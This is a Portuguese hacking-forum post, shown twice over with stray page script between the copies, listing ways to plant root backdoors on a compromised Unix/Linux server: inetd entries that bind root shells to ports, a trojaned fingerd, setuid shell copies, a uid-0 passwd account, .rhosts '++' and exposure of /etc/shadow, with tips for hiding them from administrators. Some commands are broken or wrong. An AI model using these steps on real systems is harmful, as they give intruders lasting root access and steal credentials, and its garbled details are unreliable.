Início
--->>>Backdoors
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
1-Couried
Hi all!! Eh com muito prazer que venho escrever pela 1a sobre Backdoors, Estudando quase 2 semanas sobre o assunto um pouco mais a fundo, estou desenvolvendo um log clear em C. prometo que em post's posteriores colocarei a disponibilidade de todos.
Mas entao vamos ao rock n' roll!! Um hacker bem inteligente com certeza
colocaria uma backdoor em sua maquina assim que obtivesse acesso root.
Aqui vou mostrar como uma linha inutil no seu /etc/services ja ajuda muito
na hora de uma instalacao de uma backdoor.
Em qualquer /etc/services contem essa linha:
courier 530/tcp rpc # experimental
| | |
|-servico |porta |servico exprimental
Entao se for pensar bem o hacker pode fazer o seguinte:
HellsBells:/# cp /bin/bash /usr/sbin
HellsBells:/# mv /usr/sbin/bash /usr/sbin/in.courierd
--->aqui copiei o bash para o /usr/sbin e renomei o bash para in.couried
que eh o nome do arquivo que se estabelece a conexao.
HellsBells:/# chmod a+x /usr/sbin/in.courierd
HellsBells:/# echo "courier stream tcp nowait root
/usr/sbin/in.courierd -i" >> /etc/inetd.conf
--->aqui deu um echo /etc/inetd.conf setando a backdoor
HellsBells:/# killall -HUP inetd
HellsBells:/# telnet provedor.com.br 530
Ai voces devem ter notado q algo simples e q naum se usa como o
in.courierd se virou algo super importante
E ainda naum fica aquela coisa que da na cara tipo
telnet stream tcp nowait root /bin/sh /bin/sh -i
pq isso realmente iria dar na cara q qqer admin o mais burro que seja
saberia que isso eh uma backdoor.
Eu naum quis ensinar a ninguem como se faz uma backdoor com uma coisa naum
usada no sistema igual ao couried mas sim mostrar como eh facil fazer
colocar backdoor no sistema enganando o admin.
Entao conselho a todos admins que sempre seeeeeempree facam um bkp do seu
inetd.conf para vc saber qdo um backdoor eh instalada em seu OS.
2-- Fingerd
Agora aqui a cobra ja comeca a fumar hehehe
Aqui a gente ja troca o /usr/sbin/in.fingerd por um trojan do fingerd ai
fica praticamente impossivel do root saber que esta instalada essa
backdoor em seu sistema pq esse trojan faz tudo do in.fingerd so que tb
abre a mais uma backdoor .
Para os animal eh so fazer isso:
HellsBells:~# cc -o in.fingerd in.fingerd
HellsBells:~# mv in.fingerd /usr/sbin
HellsBells:~# telnet provedor.com.br 79
Trying provedor.com.br...
Connected to provedor.com.br.
Escape character is '^]'.
bah <---- ai aqui vc digita sua senha que no caso seria bah
bash# <----depois cairia na backdoor
Muito simples.Anexo vai o programa
fingtrojan.c
------------
Aos admins digo que a solucao eh desabilitar o finger do inetd.conf e
fazer um bkp do mesmo em caso de alteracoes feito nele por um hacker.
AnArChY
</body>
<SCRIPT LANGUAGE="javascript">
<!--
var cuid= "10223";
var keywords= "ADFORCE";
// -->
</SCRIPT>
Olí, resolvi postar meus métodos favoritos para criar backdoors em sistemas Unix/Linux. Espero que gostem
Se alguém jí postou isso alguma vez, me perdoe pois eu não estava sabendo.
(1-)Backdoor em rlogin:
Essa é uma backdoor bobinha. Edite com o vi um arquivo chamado .rhosts que fica no diretório /home/usr (sendo usr o nome do usuírio que estí logado). Apenas insira como conteúdo essas strings:
"++" (sem as íspas).
Para acessí-la, basta agora usar o comando:
rlogin -l <username> <hostname>
exemplo:
rlogin -l K00D13 localhost
Com isso, você acessa uma shell remta com os poderes do mesmo usuírio que você hackeou.
(2-)Backdoor em cgi:
Deve-se ter acesso a míquina seja invadindo ou por outra backdoor de shell. Crie um script no diretório dos cgis pelo sistema com o seguinte conteúdo:
$1 $2 $3 $4 $5 $6 $7
Com isso, você pode usar essa backdoor para executar qualquer comando como root via browser, como se estivesse explorando a famosa e perigosa falha do phf.
(3-)Backdoor na conta sync:
Verifique a existência de uma conta chamada sync em /etc/passwd. Caso exista execute esses comandos:
# rm -f /bin/sync
# ln /bin/sync /bin/sh
Com isso, a conta sync terí uid e gid iguais a 1.
(4-) Backdoor em tftp:
Pode ser considerado uma backdoor pois com isso é possàvel pegar qualquer arquivo do sistema, incluindo os arq uivos /etc/passwd e /etc/shadow.
Paa crií-la, basta tirar o comentírio desse serviço em /etc/inetd.conf
(5-) Backdoor em finger para roubar senhas:
Faça um link de /etc/passwd e /etc/shadow para o arquivo .plan no diretório /home/root.
Agora basta dar um finger no root que todo o conteúdo dos arquivos cairí no seu terminal
(6-) Backdoor no serviço cron:
Colocando essa string em no arquivo /usr/lib/cron/cron.allow, estarí atualizando mensalmente as contas do sistema:
00 24 1 * * "cat /etc/passwd >> /usr/keeper/.pass"
(7-) Backdoor em UID/GID:
O procedimento para criar essa backdoor é adicionar uma conta com uid e gid igual a 0(zero). Bem simples. Coloque essa string em /etc/passwd:
koodie::O755:O755
/:/bin/sh
Para detectar essa backdoor basta dar o seguinte comando:
cat /etc/passwd | grep :0: (use essa se não tiver shadow)
cat /etc/shadow | grep :0: (use essa se tiver shadow)
Isso é um modo para se detectar a backdoor sem que você precise ler todo o conteúdo do arquivo(linha por linha, conta por conta...).
NOTA: Não é 0755(com zero) e sim O755(sem zero). Isso ocorre porque o Unix não reconhece letras como ID's, apenas números. Sendo assim como não serí reconhecido o "O", então o id voltarí para "0"(zero). Em outras palavras, root hehe.
(8-)Backdoor de shell:
Simples e poderosa, além de ser a mais usada. Ela da uma shell remota com poderes de root para qualquer usuírio. Estando logado como root, faça o seguinte:
# cp /bin/sh /home/koodie
# chmod 755 /home/koodie/sh
# chmod +s /home/koodie/sh
dica: renomeie o arquivo sh para algo mais inofensivo
Basta executí-la para acessar.
Essa backdoor é difàcil de ser rastreada, mas hí um método, veja:
# find /home/ -perm -4000
Isso mostra todos os arquivos marcados com setuids(+s) e assim se pega a backdoor.
outra dica: coloque sua backdoor em um diretório público com bastante setuids para confundir o administrador e não em um lugar suspeito como /home/usr.
(9-) Backdoor em service:
Essa é simples, porém a mais fícil de ser detectada, e também só funciona em sistemas mais antigos que possuem o arquivo inetd.conf. Digite os seguintes comandos como root:
# echo "stupid 775/tcp cnn" >> /etc/services
# echo "stupid stream tcp nowait root /bin/sh -i" >> /etc/inetd.conf
Basta dar um telnet pela porta 775 tcp e você terí uma rrs (remote root shell XD)
Você pode deixar a backdoor menos detectível, procure a linha do serviço courier no /etc/inetd.conf e mude para
courier stream tcp nowait root /usr/sbin/in.courierd -i
Se não for encontrado o serviço, adicione-o no /etc/services:
courier 530/tcp rpc # experimental
Agora execute esses comandos como root:
# rm /usr/sbin/in.courierd
# cp /bin/sh /usr/sbin/in.courierd
# chmod a+x /usr/sbin/in.courierd
Tudo o que foi feito é copiar a shell para o arquivo que estabele a conexão do courier. Isso pode ser feito com qualquer serviço, não apenas o courier.
FIM.
Bom pessoal é isso ai. Espero novamente que vocês tenham gostado. E obrigado
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
1-Couried
Hi all!! Eh com muito prazer que venho escrever pela 1a sobre Backdoors, Estudando quase 2 semanas sobre o assunto um pouco mais a fundo, estou desenvolvendo um log clear em C. prometo que em post's posteriores colocarei a disponibilidade de todos.
Mas entao vamos ao rock n' roll!! Um hacker bem inteligente com certeza
colocaria uma backdoor em sua maquina assim que obtivesse acesso root.
Aqui vou mostrar como uma linha inutil no seu /etc/services ja ajuda muito
na hora de uma instalacao de uma backdoor.
Em qualquer /etc/services contem essa linha:
courier 530/tcp rpc # experimental
| | |
|-servico |porta |servico exprimental
Entao se for pensar bem o hacker pode fazer o seguinte:
HellsBells:/# cp /bin/bash /usr/sbin
HellsBells:/# mv /usr/sbin/bash /usr/sbin/in.courierd
--->aqui copiei o bash para o /usr/sbin e renomei o bash para in.couried
que eh o nome do arquivo que se estabelece a conexao.
HellsBells:/# chmod a+x /usr/sbin/in.courierd
HellsBells:/# echo "courier stream tcp nowait root
/usr/sbin/in.courierd -i" >> /etc/inetd.conf
--->aqui deu um echo /etc/inetd.conf setando a backdoor
HellsBells:/# killall -HUP inetd
HellsBells:/# telnet provedor.com.br 530
Ai voces devem ter notado q algo simples e q naum se usa como o
in.courierd se virou algo super importante
E ainda naum fica aquela coisa que da na cara tipo
telnet stream tcp nowait root /bin/sh /bin/sh -i
pq isso realmente iria dar na cara q qqer admin o mais burro que seja
saberia que isso eh uma backdoor.
Eu naum quis ensinar a ninguem como se faz uma backdoor com uma coisa naum
usada no sistema igual ao couried mas sim mostrar como eh facil fazer
colocar backdoor no sistema enganando o admin.
Entao conselho a todos admins que sempre seeeeeempree facam um bkp do seu
inetd.conf para vc saber qdo um backdoor eh instalada em seu OS.
2-- Fingerd
Agora aqui a cobra ja comeca a fumar hehehe
Aqui a gente ja troca o /usr/sbin/in.fingerd por um trojan do fingerd ai
fica praticamente impossivel do root saber que esta instalada essa
backdoor em seu sistema pq esse trojan faz tudo do in.fingerd so que tb
abre a mais uma backdoor
.Para os animal eh so fazer isso:
HellsBells:~# cc -o in.fingerd in.fingerd
HellsBells:~# mv in.fingerd /usr/sbin
HellsBells:~# telnet provedor.com.br 79
Trying provedor.com.br...
Connected to provedor.com.br.
Escape character is '^]'.
bah <---- ai aqui vc digita sua senha que no caso seria bah
bash# <----depois cairia na backdoor
Muito simples.Anexo vai o programa
fingtrojan.c
------------
Aos admins digo que a solucao eh desabilitar o finger do inetd.conf e
fazer um bkp do mesmo em caso de alteracoes feito nele por um hacker.
AnArChY
</body>
<SCRIPT LANGUAGE="javascript">
<!--
var cuid= "10223";
var keywords= "ADFORCE";
// -->
</SCRIPT>
Olí, resolvi postar meus métodos favoritos para criar backdoors em sistemas Unix/Linux. Espero que gostem
Se alguém jí postou isso alguma vez, me perdoe pois eu não estava sabendo.
(1-)Backdoor em rlogin:
Essa é uma backdoor bobinha. Edite com o vi um arquivo chamado .rhosts que fica no diretório /home/usr (sendo usr o nome do usuírio que estí logado). Apenas insira como conteúdo essas strings:
"++" (sem as íspas).
Para acessí-la, basta agora usar o comando:
rlogin -l <username> <hostname>
exemplo:
rlogin -l K00D13 localhost
Com isso, você acessa uma shell remta com os poderes do mesmo usuírio que você hackeou.
(2-)Backdoor em cgi:
Deve-se ter acesso a míquina seja invadindo ou por outra backdoor de shell. Crie um script no diretório dos cgis pelo sistema com o seguinte conteúdo:
$1 $2 $3 $4 $5 $6 $7
Com isso, você pode usar essa backdoor para executar qualquer comando como root via browser, como se estivesse explorando a famosa e perigosa falha do phf.
(3-)Backdoor na conta sync:
Verifique a existência de uma conta chamada sync em /etc/passwd. Caso exista execute esses comandos:
# rm -f /bin/sync
# ln /bin/sync /bin/sh
Com isso, a conta sync terí uid e gid iguais a 1.
(4-) Backdoor em tftp:
Pode ser considerado uma backdoor pois com isso é possàvel pegar qualquer arquivo do sistema, incluindo os arq uivos /etc/passwd e /etc/shadow.
Paa crií-la, basta tirar o comentírio desse serviço em /etc/inetd.conf
(5-) Backdoor em finger para roubar senhas:
Faça um link de /etc/passwd e /etc/shadow para o arquivo .plan no diretório /home/root.
Agora basta dar um finger no root que todo o conteúdo dos arquivos cairí no seu terminal
(6-) Backdoor no serviço cron:
Colocando essa string em no arquivo /usr/lib/cron/cron.allow, estarí atualizando mensalmente as contas do sistema:
00 24 1 * * "cat /etc/passwd >> /usr/keeper/.pass"
(7-) Backdoor em UID/GID:
O procedimento para criar essa backdoor é adicionar uma conta com uid e gid igual a 0(zero). Bem simples. Coloque essa string em /etc/passwd:
koodie::O755:O755
/:/bin/shPara detectar essa backdoor basta dar o seguinte comando:
cat /etc/passwd | grep :0: (use essa se não tiver shadow)
cat /etc/shadow | grep :0: (use essa se tiver shadow)
Isso é um modo para se detectar a backdoor sem que você precise ler todo o conteúdo do arquivo(linha por linha, conta por conta...).
NOTA: Não é 0755(com zero) e sim O755(sem zero). Isso ocorre porque o Unix não reconhece letras como ID's, apenas números. Sendo assim como não serí reconhecido o "O", então o id voltarí para "0"(zero). Em outras palavras, root hehe.
(8-)Backdoor de shell:
Simples e poderosa, além de ser a mais usada. Ela da uma shell remota com poderes de root para qualquer usuírio. Estando logado como root, faça o seguinte:
# cp /bin/sh /home/koodie
# chmod 755 /home/koodie/sh
# chmod +s /home/koodie/sh
dica: renomeie o arquivo sh para algo mais inofensivo
Basta executí-la para acessar.
Essa backdoor é difàcil de ser rastreada, mas hí um método, veja:
# find /home/ -perm -4000
Isso mostra todos os arquivos marcados com setuids(+s) e assim se pega a backdoor.
outra dica: coloque sua backdoor em um diretório público com bastante setuids para confundir o administrador e não em um lugar suspeito como /home/usr.
(9-) Backdoor em service:
Essa é simples, porém a mais fícil de ser detectada, e também só funciona em sistemas mais antigos que possuem o arquivo inetd.conf. Digite os seguintes comandos como root:
# echo "stupid 775/tcp cnn" >> /etc/services
# echo "stupid stream tcp nowait root /bin/sh -i" >> /etc/inetd.conf
Basta dar um telnet pela porta 775 tcp e você terí uma rrs (remote root shell XD)
Você pode deixar a backdoor menos detectível, procure a linha do serviço courier no /etc/inetd.conf e mude para
courier stream tcp nowait root /usr/sbin/in.courierd -i
Se não for encontrado o serviço, adicione-o no /etc/services:
courier 530/tcp rpc # experimental
Agora execute esses comandos como root:
# rm /usr/sbin/in.courierd
# cp /bin/sh /usr/sbin/in.courierd
# chmod a+x /usr/sbin/in.courierd
Tudo o que foi feito é copiar a shell para o arquivo que estabele a conexão do courier. Isso pode ser feito com qualquer serviço, não apenas o courier.
FIM.
Bom pessoal é isso ai. Espero novamente que vocês tenham gostado. E obrigado